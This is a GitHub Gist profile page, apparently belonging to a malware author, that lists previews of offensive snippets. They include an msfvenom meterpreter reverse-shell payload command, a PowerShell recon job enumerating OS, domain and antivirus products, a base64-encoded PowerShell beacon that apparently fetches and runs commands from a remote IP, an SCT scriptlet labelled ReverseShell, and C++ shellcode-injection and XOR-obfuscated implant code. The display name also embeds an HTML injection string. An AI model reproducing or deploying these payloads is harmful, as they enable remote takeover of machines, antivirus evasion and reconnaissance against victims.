Trevor Saudi';"/></p><h1>hey</h1> trevorsaudi

🔬

Writing Malware

☕💻

212 followers · 79 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

trevorsaudi / msfvenom.bash

Created June 15, 2024 17:22

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.75.128 LPORT=9001 -f raw > protection.bin

trevorsaudi / usJzY.ps1

Created June 15, 2024 16:12

	$udGXjGVXGXbtYwiRfqjVk = Start-Job -ScriptBlock {
	$SyXSoDNGGAhAAe = (Get-WmiObject -Class Win32_OperatingSystem).Caption
	$Cg = '25'
	$BmeBoy = '39b24536-f33f-48ee-9d63-4723e42e16f9'
	$hr = [System.Net.WebUtility]::UrlEncode($SyXSoDNGGAhAAe)
	$hhowUyysZxUVhmaQelBiPDRiUn = Get-WmiObject Win32_ComputerSystem \| Select-Object -ExpandProperty Domain
	$LhvJgxbikeJRfx = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
	$JDJDUfKZAfHGJBoPloDnifXiw = $LhvJgxbikeJRfx \| ForEach-Object {
	$_.displayName
	}

trevorsaudi / ps.ps1

Created December 4, 2023 13:51

ps.ps1

powershell -e JABzAD0AJwAxADUAOQAuADYANQAuADEANgA4AC4AMQAzADUAOgA4ADAAOAAwACcAOwAkAGkAPQAnAGUAZgA5AGQAYgA1ADMAOAAtADIANQBiADIAYgA3ADAANQAtAGMAMQAyAGUAMwBhADAANAAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwBlAGYAOQBkAGIANQAzADgAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AYwA3ADEAMQAtAGIAYgA0ADUAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMgA1AGIAMgBiADcAMAA1ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGMANwAxADEALQBiAGIANAA1ACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQ

trevorsaudi / ws.sct

Last active December 4, 2023 13:52

	<?XML version="1.0"?>
	<scriptlet>

	<registration
	description="ReverseShell"
	progid="ReverseShell"
	version="1.00"
	classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

trevorsaudi / ZeroImport.cpp

Created October 23, 2023 05:48

	#include <windows.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include "helpers.h"

	#pragma comment(linker, "/entry:WinMain")


	typedef DWORD (WINAPI * WaitForSingleObject_t)(

trevorsaudi / helpers.cpp

Created October 17, 2023 05:59

helpers.cpp

	#include "PEstructs.h"
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include "helpers.h"


	HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) {

	// get the offset of Process Environment Block

trevorsaudi / FinalImplant2.cpp

Created October 16, 2023 19:49

FinalImplant2.cpp

	#include <windows.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>


	void XOR(char * data, size_t data_len, char * key, size_t key_len) {
	int j;

	j = 0;

trevorsaudi / DynamicShellInject.cpp

Created October 16, 2023 18:47

DynamicShellInject.cpp

	#include <windows.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	int main(void) {
	HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
	HMODULE hNtdll = GetModuleHandle("ntdll.dll");
	DWORD oldprotect;
	// Function pointers typedefs

trevorsaudi / MessageBox2.c

Last active October 16, 2023 16:07

	#include <windows.h>
	#include <iostream>

	#define KEY 'A' // our key

	// Function to encrypt/decrypt strings
	void XOR(LPSTR data, int data_len) {
	for (int i = 0; i < data_len; i++) {
	data[i] ^= KEY;
	}

trevorsaudi / MessageBox.c

Last active October 16, 2023 16:07

	#include <windows.h>
	#include <iostream>

	int main() {
	// Load the user32.dll library
	HMODULE user32Dll = GetModuleHandle(L"user32.dll");

	// Define a function pointer for MessageBoxW
	typedef int (WINAPI* MessageBoxWFunc)(
	HWND hwnd,

NewerOlder